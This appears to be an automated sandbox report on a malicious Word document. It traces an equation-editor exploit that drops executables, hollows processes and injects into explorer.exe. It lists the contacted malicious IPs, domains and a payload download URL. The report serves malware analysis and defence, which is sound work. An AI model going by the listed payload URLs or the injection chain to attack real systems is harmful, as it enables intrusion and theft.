Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 491424 Sample: OBL PN210700369.doc Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 46 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 15 other signatures 2->52 10 EQNEDT32.EXE 11 2->10         started        15 WINWORD.EXE 291 23 2->15         started        process3 dnsIp4 38 lg-tv.tk 185.239.243.112, 49165, 80 CLOUDIE-AS-APCloudieLimitedHK Moldova Republic of 10->38 32 C:\Users\user\AppData\...\obinnamaxdw2962.exe, PE32 10->32 dropped 34 C:\Users\user\AppData\...\obinnazx[1].exe, PE32 10->34 dropped 70 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->70 17 obinnamaxdw2962.exe 1 5 10->17         started        file5 signatures6 process7 signatures8 40 Multi AV Scanner detection for dropped file 17->40 42 Tries to detect virtualization through RDTSC time measurements 17->42 44 Injects a PE file into a foreign processes 17->44 20 obinnamaxdw2962.exe 17->20         started        process9 signatures10 54 Modifies the context of a thread in another process (thread injection) 20->54 56 Maps a DLL or memory area into another process 20->56 58 Sample uses process hollowing technique 20->58 60 Queues an APC in another process (thread injection) 20->60 23 explorer.exe 20->23 injected process11 dnsIp12 36 www.islamic-coins.com 2.57.140.50, 49166, 80 MAGICRETAILFR France 23->36 62 System process connects to network (likely due to code injection or exploit) 23->62 27 cmmon32.exe 23->27         started        signatures13 process14 signatures15 64 Modifies the context of a thread in another process (thread injection) 27->64 66 Maps a DLL or memory area into another process 27->66 68 Tries to detect virtualization through RDTSC time measurements 27->68 30 cmd.exe 27->30         started        process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
2.57.140.50
 www.islamic-coins.com France
43424 MAGICRETAILFR true
185.239.243.112
 lg-tv.tk Moldova Republic of
55933 CLOUDIE-AS-APCloudieLimitedHK true

Contacted Domains

Name IP Active
lg-tv.tk 185.239.243.112 true
www.islamic-coins.com 2.57.140.50 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://lg-tv.tk/obinnazx.exe true
  • Avira URL Cloud: malware
 unknown
www.vaughnmethod.com/ed9s/ true
  • Avira URL Cloud: safe
 low
http://www.islamic-coins.com/ed9s/?tXNH2v=aXG8CVn8ddSLaR&ydudnHn=k2ojovXzPk6QP2E57heACoDYW6OrA9sZh3WmhaFm9atosFE1d0WL15gHEPMcVErHBLYJUA== true
  • Avira URL Cloud: safe
 unknown